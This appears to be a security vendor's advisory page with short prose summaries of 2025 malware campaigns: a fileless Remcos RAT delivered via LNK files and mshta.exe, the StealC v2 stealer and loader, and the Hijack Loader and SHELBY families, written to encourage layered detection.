Security Advisories

In May 2025, a stealthy malware campaign was identified delivering a fileless variant of the Remcos Remote Access Trojan (RAT) via malicious Windows Shortcut (LNK) files and PowerShell-based execution chains. The campaign exemplifies how attackers are increasingly bypassing traditional security controls by leveraging native Windows tools like <code>mshta.exe</code> to execute payloads directly in memory — leaving minimal forensic traces. Phishing emails, often themed around taxes, are used to lure victims into triggering the infection chain, ultimately granting attackers full remote access. This operation highlights a broader trend in cybercrime: the weaponisation of legitimate system components and fileless techniques to quietly establish persistent control, exfiltrate data, and evade detection. Remcos, once a commercial RAT, continues to evolve as a favoured tool in espionage, fraud, and credential theft — with this campaign marking a sharp escalation in its stealth and delivery. These developments reinforce the need for a defence-in-depth strategy. Relying solely on a single security vendor — especially Microsoft Defender, which is deeply integrated into Windows and frequently targeted by attackers — leaves organisations exposed to blind spots. Combining complementary detection layers, including network, behavioural, and memory-based analysis, is essential to identify and disrupt modern threats that bypass conventional, signature-based defences.…

StealC v2 marks a significant advancement in the evolution of modern information-stealing mal ,o9ware, now operating as both a stealer and a loader—engineered for stealth, modularity, and operational precision. First observed in early 2023 as a browser-focused credential harvester, StealC has rapidly evolved into a highly adaptable tool leveraged by cybercriminals across diverse campaigns.The latest version introduces notable enhancements, including advanced anti-analysis techniques, dynamic configuration logic, and staged data exfiltration routines. Its streamlined communication with command-and-control (C2) infrastructure enables fine-grained tasking, conditional payload delivery, and phased exfiltration—dramatically increasing its evasiveness and complexity in live environments. Critically, StealC v2 can delay activation of its stealer functionality based on real-time C2 commands, allowing attackers to execute operations only when predefined conditions are met. This on-demand behavior, coupled with its support for post-exfiltration payload deployment, makes StealC v2 exceptionally difficult to detect using conventional signature- or behavior-based security mechanisms.

In April 2025, cybersecurity researchers uncovered two advanced threats that highlight the grow ing sophistication of adversaries: an upgraded Hijack Loader variant and a newly discovered malware family named SHELBY (REF8685). Both demonstrate enhanced capabilities in evading detection, maintaining persistence, and misusing legitimate platforms.The Hijack Loader—also known as DOILoader, SHADOWLADDER, and GHOSTPULSE—has evolved to include call stack spoofing, direct system calls via Heaven’s Gate, and virtualisation-aware execution. These enhancements improve its ability to bypass sandboxes and endpoint protections while serving as a stealthy delivery mechanism for second-stage payloads such as Cobalt Strike. Meanwhile, SHELBY exploits GitHub for Command-and-Control (C2) communications—a tactic designed to blend into legitimate network traffic. It uses a multi-stage chain with DLL side-loading and sandbox evasion to complicate detection and analysis. These threats reinforce the need for organisations to strengthen their detection strategies against stealthy loaders, abuse of legitimate services, and evasive malware behaviours.